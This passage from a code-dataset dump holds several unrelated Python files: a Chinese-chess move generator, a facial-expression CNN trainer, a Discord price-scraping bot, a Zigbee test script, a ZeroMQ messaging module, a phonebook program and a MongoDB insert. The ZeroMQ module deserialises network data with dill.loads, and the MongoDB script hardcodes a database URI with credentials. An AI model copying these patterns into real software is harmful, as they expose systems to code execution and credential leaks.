CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n hits = False\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n to_x = x\n hits = False\n for to_y in range(y - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n hits = False\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n # 兵\n elif board_positions[y][x] == 'p' and current_player == 'b':\n to_y = y - 1\n to_x = x\n\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n if y < 5:\n to_y = y\n to_x = x + 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_x = x - 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n elif board_positions[y][x] == 'P' and current_player == 'w':\n to_y = y + 1\n 
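# red pawn ('P'): advances toward higher y; the y > 4 branch below adds sideways moves once the pawn has crossed the river\n 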
to_x = x\n\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n if y > 4:\n to_y = y\n to_x = x + 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_x = x - 1\n if (CchessEnv.check_bounds(to_y, to_x) and\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True)):\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n if K_x is not None and k_x is not None and K_x == k_x:\n face_to_face = True\n for i in range(K_y + 1, k_y, 1):\n if board_positions[i][K_x].isalpha():\n face_to_face = False\n\n if face_to_face is True:\n if current_player == 'b':\n moves.append(CchessEnv.board_pos_name[k_y][k_x] + CchessEnv.board_pos_name[K_y][K_x])\n else:\n moves.append(CchessEnv.board_pos_name[K_y][K_x] + CchessEnv.board_pos_name[k_y][k_x])\n\n return moves\n\n\nif __name__ == '__main__':\n import time\n state_str_test = \"RNBA1ABNR/4K4/1C5C1/P1PP2P1P/9/9/p1pp2p1p/1c5c1/4k4/rnba1abnr\"\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.get_legal_moves(state_str_test, \"w\")\n print(\"py get_legal_moves:\", (time.time() - time_start)*1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.get_legal_action(state_str_test, \"w\")\n print(\"C get_legal_moves:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.sim_do_action(\"a0a1\", state_str_test)\n print(\"py sim_do_action:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.sim_do_action(\"a0a1\", state_str_test)\n print(\"c sim_do_action:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.is_check_catch(state_str_test, \"w\")\n print(\"py is_check_catch:\", (time.time() - time_start)*1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.is_check_catch(state_str_test, \"w\")\n print(\"c is_check_catch:\", (time.time() - time_start) * 1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnv.game_end(state_str_test, \"w\")\n print(\"py game_end:\", (time.time() - time_start)*1000, \" ms\")\n\n time_start = time.time()\n for try_time in range(10000):\n CchessEnvC.game_end(state_str_test, \"w\")\n print(\"c game_end:\", (time.time() - time_start) * 1000, \" ms\")\n","repo_name":"liyang619/JiangJun","sub_path":"env/cchess_env.py","file_name":"cchess_env.py","file_ext":"py","file_size_in_byte":38231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"7680075330","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 12 14:11:11 2022\n\n@author: aakaa\n\"\"\"\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense,Flatten,Conv2D,Dropout,MaxPooling2D\nimport os\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport cv2\n\nImgH=48\nImgW=48\nbSize=16\ndataDir=r'D:\\Datasets\\FER\\masmbre\\archive (1)\\train'\ncategories=os.listdir(dataDir)\n\ntestData=r'D:\\Datasets\\FER\\masmbre\\archive 
(1)\\test'\ntrainDataGen=ImageDataGenerator(rescale=1./255,\n rotation_range=30,\n shear_range=0.3,\n zoom_range=0.3,\n horizontal_flip=True,\n fill_mode='nearest')\n\nvalidationDataGen=ImageDataGenerator(rescale=1./255)\n\ntrainData=trainDataGen.flow_from_directory(directory=dataDir,\n target_size=(ImgH,ImgW),\n color_mode='grayscale',\n class_mode='categorical',\n batch_size=bSize,\n shuffle=True)\n\nvalidationData=validationDataGen.flow_from_directory(directory=testData,\n target_size=(ImgH,ImgW),\n color_mode='grayscale',\n class_mode='categorical',\n batch_size=bSize,\n shuffle=True)\n\nimg,label=trainData.__next__()\n\ni=random.randint(0,(img.shape[0])-1)\nimage=img[i]\nlabl=categories[label[i].argmax()]\ncv2.imshow(labl,image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\nmodel=Sequential()\nmodel.add(Conv2D(32,kernel_size=(3,3),activation='relu',input_shape=(ImgH,ImgW,1)))\nmodel.add(Conv2D(64, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Conv2D(128, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Conv2D(256, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Conv2D(512, kernel_size=(3,3),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.15))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024,activation='relu'))\nmodel.add(Dropout(0.2))\n\nmodel.add(Dense(7,activation='softmax'))\n\nmodel.compile(optimizer = 'adam', loss='categorical_crossentropy', metrics=['accuracy'])\nprint(model.summary())\n\n\nnumTrainImg=0\nfor root,dirs,files in os.walk(dataDir):\n numTrainImg+=len(files)\n \nnumTestImg=0\nfor root,dirs,files in os.walk(testData):\n numTestImg+=len(files)\n \nnumEpochs=100\nmodelHistory=model.fit(trainData,\n steps_per_epoch=numTrainImg//bSize,\n epochs=numEpochs,\n validation_data=validationData,\n validation_steps=numTestImg//bSize)\n\n\n\nmodel.save('FER100Epochs.h5')","repo_name":"Shri-Aakash/FER-CNN","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13233542670","text":"#Taxes Functionalities\nimport string\nfrom typing import Final, final\nimport discord\nfrom discord import client\nfrom discord.ext import commands\n\nfrom bs4 import BeautifulSoup\nfrom bs4.element import AttributeValueWithCharsetSubstitution\nfrom discord.ext.commands.errors import PrivateMessageOnly\nimport requests\nimport lxml\nimport ArgentoTxt\n\n\nerrorMessage = \"Error, caracter o petición invalida.\" #well, the error message you want to show\ntodoslosImpuestos = 1.66 #taxes summed up, details in texts.py\n\nclass Example(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n #Events\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"Impuestos cog has been loaded!\")\n \n #Commands\n @commands.command(aliases=[\"calchelp\"])\n async def CALCHELP(self, ctx):\n await ctx.send(ArgentoTxt.calcHelp)\n\n #Impuesto Digital\n #+ST used to refer to steam, that's why in the code it is mentioned the way it is\n @commands.command(aliases=[\"st\"])\n async def ST(self, ctx, * argument : float):\n if isinstance(argument[0], (int, float)):\n steam = argument[0]\n if steam > 0:\n steamconimpu = steam * todoslosImpuestos\n impuestos = steamconimpu - steam \n await ctx.send(f\"El valor base es `{steam}`\\n 
Con impuestos sube a `{round(steamconimpu, 3)}`\\n El valor de los impuestos es: `{round(impuestos, 3)}`\")\n else:\n await ctx.send(ArgentoTxt.errorMessage)\n else:\n await ctx.send(ArgentoTxt.errorMessage)\n\n\n #Steam Items\n @commands.command(aliases=[\"sti\"])\n async def STI(self, ctx, * argument : float):\n tubien = argument[0]\n bien = tubien * todoslosImpuestos\n tubiencomision = tubien * 0.90\n tubienfinal = tubiencomision * todoslosImpuestos\n if tubien > 0:\n await ctx.send(f\"Tu item de steam marketplace vale `{tubien}`\\n Si fueras a comprarlo cargando plata a Steam saldria `{round(bien, 3)}`\\n Al venderlo en marketplace vale `{round(tubiencomision, 3)}`\\n Por tanto, su precio de venta en dinero real es `{round(tubienfinal, 3)}`\")\n else:\n await ctx.send(ArgentoTxt.errorMessage)\n\n\n #Steam scraping\n @commands.command(aliases=[\"sts\"])\n async def STS(self, ctx, argument):\n if (argument.find(\"https://store.steampowered.com/app\") == -1):\n await ctx.send(\"Error, ese link no se puede procesar, solo los de https://store.steampowered.com/app son utilizables\")\n else:\n r = requests.get(argument)\n soup = BeautifulSoup(r.content, \"lxml\")\n name = soup.find(\"div\", class_=\"apphub_AppName\").text\n prices = \"\"\n\n #First of all: we get all the prices\n for x in soup.find_all(\"div\", class_=\"game_purchase_action_bg\"):\n prices = f\"{prices} ~ {x.get_text()}\"\n\n #We do this in order to be sure it is the price we want because prices contains all the prices in the page\n prices = prices.strip()\n prices = prices.split(\"~\")\n firstPrice = prices[1].strip()\n\n #If it can finde free: its free\n if (firstPrice.find(\"Free\") > -1):\n await ctx.send(f\"`{name} es gratuito!`\")\n\n #If it can find download: then it is a demo\n elif (firstPrice.find(\"Download\") > -1):\n await ctx.send(f\"`{name} tiene/es una demo!`\")\n\n #if you can put it in your cart, then it is a paid game \n elif (firstPrice.find(\"Add to Cart\") > -1):\n\n #Getting the last price in the string, works with games on discount and those who are not\n firstPrice = firstPrice.split(\"$\")\n firstPrice = firstPrice[-1]\n\n #Now, to avoid a million methods() we'll check if its a character we want\n final = \"\"\n for x in firstPrice:\n if x.isdigit() == True: \n final += x\n elif x == \",\":\n final += \".\"\n \n #Finally, we get a float and then the taxes are calculated\n final = float(final)\n steamConImpu = final * todoslosImpuestos\n impuestos = steamConImpu - final\n await ctx.send(f\"El juego es `{name}`\\nVale `{final}`\\nCon impuestos sube a `{round(steamConImpu, 2)}`\\nEl valor de los impuestos es: `{round(impuestos, 2)}`\")\n else: \n await ctx.send(\"Error\")\n\n #Ubisoft scraping\n @commands.command(aliases=[\"ubi\"])\n async def UBI(self, ctx, argument):\n #First of all, we start by looking if it is a ubisoft official link\n if ((argument.find(\"https://store.ubi.com\") == -1)):\n await ctx.send(\"Error, ese link no se puede procesar, solo los de https://store.ubi.com son utilizables\")\n else:\n #Getting all we need\n r = requests.get(argument)\n soup = BeautifulSoup(r.content, \"lxml\")\n\n price = soup.find(\"div\", class_=\"flex-reverse-order\").text\n name = soup.find(\"span\", class_=\"product-title-wrapper product-name product-header-name\").text\n name = name.strip()\n price = price.strip()\n \n #IN the ubisoft store, if a game is free, it has nothing in the price related div, just empty spaces, thats why there is a strip method\n if price == \"\": await ctx.send(f\"El juego es 
`{name}`\\n`Es Gratuito!`\")\n else:\n #Now that we know it is not free, price is converted to a float\n price = price.replace(\".\", \"\").split(\"$\")\n price = price[1].strip()\n price = price.replace(\",\", \".\")\n price = float(price)\n #Calculating taxes...\n priceConImpu = price * todoslosImpuestos\n impuestos = priceConImpu - price\n\n #Last part: the description only appears on DLCs for some reason, even though it should be found on games also\n #If it has a Description, it will send it, if it doesnt it wont even try\n if (soup.find(\"span\", class_=\"product-header-edition similar-with-h2\") != None):\n\n description = soup.find(\"span\", class_=\"product-header-edition similar-with-h2\").text\n description = description.split(\"-\")\n description = description[0].strip()\n\n await ctx.send(f\"El juego es `{name}`\\nMás exactamente `{description}`\\nVale `{price}`\\nCon impuestos sube a `{round(priceConImpu, 2)}`\\nEl valor de los impuestos es: `{round(impuestos, 2)}`\")\n else: await ctx.send(f\"El juego es `{name}`\\nVale `{price}`\\nCon impuestos sube a `{round(priceConImpu, 2)}`\\nEl valor de los impuestos es: `{round(impuestos, 2)}`\")\n\n\ndef setup(client):\n client.add_cog(Example(client))","repo_name":"Ale-SaP/ArgentoBot","sub_path":"cogs/impuestos.py","file_name":"impuestos.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74326918913","text":"\"\"\"\n@testcase\n@description 2.1 TP-PRE-TC-00: Network start - ZED & ZR factory new\n\n@tags\n POSITIVE\n \n@connection dummyPort = router\n\"\"\"\n\n#*****************************************************************************************\n#Defines section\n#*****************************************************************************************\nimport sys\nsys.path.append(scriptPath)\nfrom common import *\nfrom deviceScanner import *\nsys.path.remove(scriptPath)\n\n#*****************************************************************************************\n# Initialization\n#*****************************************************************************************\\\nportList = []\n\nconfigureCommunication()\n\ned1 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_END_DEVICE, portList)\ned2 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_END_DEVICE, portList)\nr1 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_ROUTER, portList)\nr2 = deviceScannerGetAssociatedPort(TEST_DEVICE_TYPE_ROUTER, portList)\n\n#*****************************************************************************************\n#Script body - feature checking\n#*****************************************************************************************\nwriteLog(\"Resetting nodes to FN\")\nresetRouterToFN([r1, r2])\nresetEndDeviceToFN([ed1, ed2])\nclearPorts([r1, r2, ed1, ed2])\n\nwriteLog(\"Resetting mac ban table\")\nresetBanTable([r1, r2, ed1, ed2])\n\ned1ExtAddr = getExtAddr(ed1)\nwriteLog(\"ED1 extended address - %016X\" % ed1ExtAddr)\n\ned2ExtAddr = getExtAddr(ed2)\nwriteLog(\"ED2 extended address - %016X\" % ed2ExtAddr)\n\nr1ExtAddr = getExtAddr(r1)\nwriteLog(\"R1 extended address - %016X\" % r1ExtAddr)\n\nr2ExtAddr = getExtAddr(r2)\nwriteLog(\"R2 extended address - %016X\" % r1ExtAddr)\n\nwriteLog(\"Change link quality between R1, R2, ED2 and ED1\")\nsetRssiForExtAddress([r1, r2, ed2], ed1ExtAddr, touchlinkRssiThreshold - 10)\n\nsetTargetType(r1, TARGET_TYPE_TOUCHLINK)\nsleep(2)\n\nwriteLog(\"2a Start touchlink ED1 to R1\")\nsendCommand(ed1, 
touchlickCmd)\nwriteLog(\"2b No scan response indication on ED1\")\nidle([ed1, r1, r2])\n\nwriteLog(\"Revert link quality between R1 and ED1\")\nresetBanTable([r1])\nsetTargetType(r1, TARGET_TYPE_TOUCHLINK)\nsleep(2)\n\nwriteLog(\"3 Start touchlink ED1 to R1\")\nsendCommand(ed1, touchlickCmd)\nwriteLog(\"4 Scan response indication on ED1\")\nreceiveAndCheck(ed1, scanRespIndStr)\n","repo_name":"binaryArrow/airquality","sub_path":"BitCloud_Dateien/Evaluation Tools/ZLL_Scripts/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2436764995","text":"from concurrent.futures import ThreadPoolExecutor\nimport random\n\nfrom dill import dumps, loads\nfrom toolz import merge, get\nimport trollius as asyncio\nfrom trollius import From, Return, Task\nimport zmq\n\ncontext = zmq.Context()\n\n\n@asyncio.coroutine\ndef comm(ip, port, bind_ip, signal_q, control_q, outgoing_q,\n loop=None, context=None):\n \"\"\" Communications coroutine\n\n Input Channels:\n ZMQ router: from outside world\n signal_q: to break waits on the router\n outgoing_q: data that needs to be sent out on the router\n\n Output Channels:\n ZMQ router: to the outside world\n control_q: put messages from outside world here for handling\n\n Interacts with:\n send, control\n \"\"\"\n loop = loop or asyncio.get_event_loop()\n context = context or zmq.Context()\n\n router = context.socket(zmq.ROUTER)\n router.bind('tcp://%s:%d' % (bind_ip, port))\n\n dealer = context.socket(zmq.DEALER)\n dealer.connect('tcp://127.0.0.1:%d' % port)\n\n wait_signal = Task(signal_q.get(), loop=loop)\n\n while True:\n wait_router = delay(loop, router.recv_multipart)\n [first], [other] = yield From(asyncio.wait([wait_router, wait_signal],\n return_when=asyncio.FIRST_COMPLETED))\n\n if first is wait_signal: # Interrupt socket recv\n dealer.send(b'break')\n addr, data = yield From(wait_router) # should be fast\n assert data == b'break'\n\n while not outgoing_q.empty(): # Flow data out\n addr, msg = outgoing_q.get_nowait()\n router.send_multipart([addr, msg])\n print(\"Message sent\")\n\n if first is wait_signal: # Handle internal messages\n msg = wait_signal.result()\n if msg == b'close':\n control_q.put_nowait((None, b'close'))\n break\n elif msg == b'interrupt':\n wait_signal = Task(signal_q.get(), loop=loop)\n continue\n elif first is wait_router: # Handle external messages\n addr, byts = wait_router.result()\n msg = loads(byts)\n print(\"Communication received: %s\" % str(msg))\n control_q.put_nowait((addr, msg))\n\n router.close(linger=2)\n dealer.close(linger=2)\n\n raise Return(\"Comm done\")\n\n\n@asyncio.coroutine\ndef pingpong(pingpong_q, send_q):\n \"\"\" A simple pingpong coroutine\n\n Input Channels:\n pingpong_q: should have messages of the form\n (address, {'op': 'ping'}\n\n Output Channels:\n send_q: send out messages of the form\n (address, b'pong')\n \"\"\"\n print(\"pingpong boots up\")\n while True:\n addr, msg = yield From(pingpong_q.get())\n if msg == b'close':\n break\n\n send_q.put_nowait((addr, b'pong'))\n\n raise Return(\"PingPong done\")\n\n\n@asyncio.coroutine\ndef control(control_q, out_qs):\n \"\"\" Control coroutine, general dispatch\n\n Input Channels:\n control_q: Mailbox for any messages that come in from comm\n\n Output Channels:\n out_qs: a dictionary of operator: queue pairs\n {'compute': compute_q, 'pingpong': pingpong_q}\n\n \"\"\"\n print(\"Control boots up\")\n while True:\n addr, msg = yield 
From(control_q.get())\n if msg == b'close':\n for q in set(out_qs.values()):\n q.put_nowait((addr, b'close'))\n break\n try:\n q = out_qs[msg['op']]\n except KeyError:\n raise NotImplementedError(\"Don't know how to route: %s\" % msg)\n q.put_nowait((addr, msg))\n\n raise Return(\"Control done\")\n\n\n@asyncio.coroutine\ndef send(send_q, outgoing_q, signal_q):\n \"\"\" Prep outgoing data before sending out on the wire\n\n In particular the router is currently doing a blocking recv. We need to\n load an interrupt onto the signal queue as we load up the message onto the\n outgoing queue\n\n Input Channels:\n send_q: Messages of (addr, obj) pairs\n\n Output Channels:\n outgoing_q: Messages of (addr, bytes) pairs\n signal_q: An interrupt signal to break the current block on the socket\n \"\"\"\n print(\"Send boots up\")\n while True:\n addr, msg = yield From(send_q.get())\n if msg == b'close':\n break\n\n print(\"Enque outgoing message: %s\" % str(msg))\n if not isinstance(msg, bytes):\n msg = dumps(msg)\n outgoing_q.put_nowait((addr, msg))\n signal_q.put_nowait('interrupt')\n\n raise Return(\"Send done\")\n\n\n@asyncio.coroutine\ndef dealer_send_recv(loop, addr, data):\n socket = context.socket(zmq.DEALER)\n socket.connect(addr)\n if not isinstance(data, bytes):\n data = dumps(data)\n yield From(delay(loop, socket.send, data))\n result = yield From(delay(loop, socket.recv))\n socket.close() # TODO: LRU sockets\n try:\n result = loads(result)\n except Exception as e:\n print(e)\n raise Return(result)\n\n\nexecutor = ThreadPoolExecutor(20)\n\n\ndef delay(loop, func, *args, **kwargs):\n \"\"\" Run function in separate thread, turn into coroutine \"\"\"\n future = executor.submit(func, *args, **kwargs)\n return asyncio.futures.wrap_future(future, loop=loop)\n","repo_name":"mrocklin/dist","sub_path":"dist/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"10144744726","text":"#폰북 리스트\npList = [\n {\"name\":\"friend1\", \"phone\":\"010-1111-1111\", \"addr\":\"서울시 종로구\"},\n {\"name\":\"friend2\", \"phone\":\"010-2222-2222\", \"addr\":\"수원시 팔달구\"},\n {\"name\":\"friend3\", \"phone\":\"010-3333-3333\", \"addr\":\"부산시 사하구\"},\n {\"name\":\"friend2\", \"phone\":\"010-4444-4444\", \"addr\":\"광주시 송정동\"},\n {\"name\":\"friend4\", \"phone\":\"010-4444-4444\", \"addr\":\"광주시 송정동\"}\n]\n\nwhile True:\n print(\"1.입력 2.출력 3.검색 4.수정 5.삭제 6.종료\")\n no = int(input(\"선택: \"))\n if no == 1 :\n print(\"{:-^50}\".format(\" 입력기능 \"))\n # 친구 정보를 저장 하기위해 딕셔너리를 준비한다.\n people = {}\n # 딕셔너리에 키에 대응하는 값을 입력 받는다.\n people[\"name\"] = input(\"성명>>> \")\n people[\"phone\"] = input(\"전화>>> \")\n people[\"addr\"] = input(\"주소>>> \")\n # 친구 정보가 저장 된 데이터를 리스트에 추가한다.\n pList.append(people)\n print(\"주소 입력 완료!\")\n elif no == 2 :\n print(\"{:-^50}\".format(\" 출력기능 \"))\n # 목록의 필드 제목을 출력 한다.\n print(\"{:^3}{:^10}{:^15}{:^20}\".format(\"번호\", \"성명\", \"전화\", \"주소\") )\n print(\"-\"*53)\n # for 반복문을 이용해서 리스트의 내용을 화면에 출력한다.\n for i, p in enumerate(pList) :\n print(\"{:^3}{:^10}{:^15}{:^20}\".format(i+1,p[\"name\"],p[\"phone\"],p[\"addr\"]))\n elif no == 3 :\n print(\"{:-^50}\".format(\" 검색기능 \"))\n # 검색 할 이름을 입력 받아서 변수에 저장한다.\n search_name = input(\"검색 할 이름 입력>>> \")\n # 입력 받은 내용이 없다면 다시 입력 받는다.\n while(len(search_name) == 0) :\n print(\"검색어를 1글자 이상 입력 하세요!\")\n search_name = input(\"검색 할 이름 입력>>> \")\n # 중복된 이름이 있을 수 있기 때문에 검색한 데이터를 저장할 리스트를 준비한다.\n search_list = [];\n # 리스트의 내용을 하나씩 검색한다.\n for i, p in 
enumerate(pList) :\n # 검색어와 같은 이름이 있다면 미리 준비된 리스트에 추가 한다.\n if(p[\"name\"] == search_name) :\n search_list.append(p);\n # 검색 내용이 없다면 검색 내용이 없다는 메세지를 출력한다.\n if(len(search_list) == 0) :\n print(search_name+\"으로 검색 한 내용이 없습니다.\")\n else :\n # 검색 내용이 있다면 검색 내용을 출력 한다.\n for i, p in enumerate(search_list) :\n print(\"{:^3}{:^10}{:^15}{:^20}\".format(i+1,p[\"name\"],p[\"phone\"],p[\"addr\"]))\n elif no == 4 :\n print(\"{:-^50}\".format(\" 수정기능 \"))\n # 목록에서 수정 할 번호를 선택한다.\n modify_no = int(input(\"수정 할 번호 입력>>> \"))\n # 리스트의 범위 보다 초과된 값이 입력되면 다시 입력 받도록 한다.\n while(modify_no<1 or modify_no>len(pList)) :\n print(\"입력 범위를 초과 했습니다!\")\n modify_no = int(input(\"수정 할 번호 입력>>> \"))\n # 목록의 인덱스르로 사용하기 위해서 번호-1을 한다. 인덱스튼 0부터 시작하기 때문이다.\n modify_no -= 1;\n # 성명, 전화번호, 주소 중에 수정 할 항목을 선택 한다.\n print(\"\\n수정 할 항목을 입력 하세요.\")\n print(\"1.성명 2.전화번호 3.주소 4.모두\")\n modify_select = int(input(\"선택>>> \"))\n if(modify_select == 1) :\n pList[modify_no][\"name\"] = input(\"새 이릅 입력>>> \")\n elif (modify_select == 2):\n pList[modify_no][\"phone\"] = input(\"새 전화번호 입력>>> \")\n elif (modify_select == 3):\n pList[modify_no][\"addr\"] = input(\"새 주소 입력>>> \")\n elif (modify_select == 4) :\n # 성명, 전화번호, 주소를 한꺼번에 수정 하는 메뉴\n pList[modify_no][\"name\"] = input(\"새 이릅 입력>>> \")\n pList[modify_no][\"phone\"] = input(\"새 전화번호 입력>>> \")\n pList[modify_no][\"addr\"] = input(\"새 주소 입력>>> \")\n else :\n print(\"선택 항목이 없습니다!\")\n elif no == 5 :\n print(\"{:-^50}\".format(\" 삭제기능 \"))\n # 목록에서 삭제할 번호를 입력 받는다.\n delete_no = int(input(\"삭제 할 번호 입력>>> \"))\n # 목록의 수보다 초과된 값이 들어오면 다시 입력 받는다.\n while (delete_no < 1 or delete_no > len(pList)):\n print(\"입력 범위를 초과 했습니다!\")\n delete_no = int(input(\"삭제 할 번호 입력>>> \"))\n # 목록에서 해당 항목을 삭제한다.\n del pList[delete_no-1];\n print(\"삭제 완료 하였습니다!\")\n elif no == 6 :\n print(\"{:-^50}\".format(\" 종료-굿바이 \"))\n # 반복문을 탈출 하면 프로그램이 종료 된다.\n break\n else :\n print(\"{:-^50}\".format(\" 선택 사항 없슴 \"))\n\n print() #공백 라인 추가\n\n# end of while\nprint(\"다음 기회에 만나요~\")","repo_name":"comstudy21joon/python","sub_path":"ch05_list_for/ch05ex14.py","file_name":"ch05ex14.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24583099143","text":"import sys\nfrom collections import deque\nfrom pprint import pprint\n\ndef find(x):\n if root[x] == x:\n return x\n root[x] = find(root[x])\n return root[x]\n\n\ndef union(x, y):\n x = find(x)\n y = find(y)\n\n if x == y:\n return False\n\n if rank[x] < rank[y]:\n root[x] = y\n else:\n root[y] = x\n if rank[x] == rank[y]:\n rank[x] += 1\n return True\n\n\ndxy = [(-1, 0), (0, 1), (1, 0), (0, -1)]\ninput = sys.stdin.readline\nN, M = map(int, input().split())\ncountry = [list(map(int, input().split())) for _ in range(N)]\nedges = set()\nnum = 2\nfor r in range(N):\n for c in range(M):\n if country[r][c] == 1:\n country[r][c] = num\n queue = deque([(r, c)])\n while queue:\n y, x = queue.popleft()\n for dy, dx in dxy:\n yi = y + dy\n xi = x + dx\n if 0 <= yi < N and 0 <= xi < M and country[yi][xi] == 1:\n country[yi][xi] = num\n queue.append((yi, xi))\n num += 1\n\nroot = [i for i in range(num)]\nrank = [0] * num\nadj = [set() for _ in range(num)]\n\nfor r in range(N):\n c = 0\n cnt = 0\n past = country[r][0]\n while c < M - 1:\n c += 1\n now = country[r][c]\n if not now:\n cnt += 1\n elif now == past and cnt >= 1:\n cnt = 0\n elif now != past:\n if past == 0:\n cnt = 0\n past = now\n else:\n if cnt > 1:\n edges.add((past, now, cnt))\n adj[past].add(now)\n adj[now].add(past)\n past 
= now\n cnt = 0\n\nfor c in range(M):\n r = 0\n cnt = 0\n past = country[0][c]\n while r < N - 1:\n r += 1\n now = country[r][c]\n if not now:\n cnt += 1\n elif now == past and cnt >= 1:\n cnt = 0\n elif now != past:\n if past == 0:\n cnt = 0\n past = now\n else:\n if cnt > 1:\n edges.add((past, now, cnt))\n adj[past].add(now)\n adj[now].add(past)\n past = now\n cnt = 0\n\ndef chk_bridge():\n global edges\n vis = [False] * num\n stack = deque([2])\n while stack:\n node = stack.pop()\n if not vis[node]:\n vis[node] = True\n stack.extend(adj[node])\n\n if sum(vis) != num - 2:\n return -1\n \n edges = sorted(list(edges), key=lambda x: x[2])\n res = 0\n vis = [False] * num\n vis[0] = vis[1] = True\n for n1, n2, w in edges:\n if w < 2 or (vis[n1] and vis[n2]):\n continue\n if union(n1, n2):\n vis[n1] = True\n vis[n2] = True\n res += w\n\n print(res)\n pprint(country)\n print(edges)\n return res\n \n \n\nres = chk_bridge()\nprint(res)","repo_name":"seoul-ssafy-class-2-studyclub/Indong-python","sub_path":"Python/BOJ/17472_다리 만들기2.py","file_name":"17472_다리 만들기2.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27106862523","text":"from pymongo import MongoClient\nuri = \"mongodb://admin:admin@ds021182.mlab.com:21182/c4e\"\nclient = MongoClient(uri)\ndb = client.get_database()\npost_collection = db[\"post\"]\nnew_document = {\n \"title\":\"???\",\n \"author\": \"HOÀNG\",\n \"content\":\"J'aime la salle de classe\"\n}\npost_collection.insert_one(new_document)\nclient.close()","repo_name":"nmhoangg2000/lab-c4e24","sub_path":"lab1/homework/se23.py","file_name":"se23.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 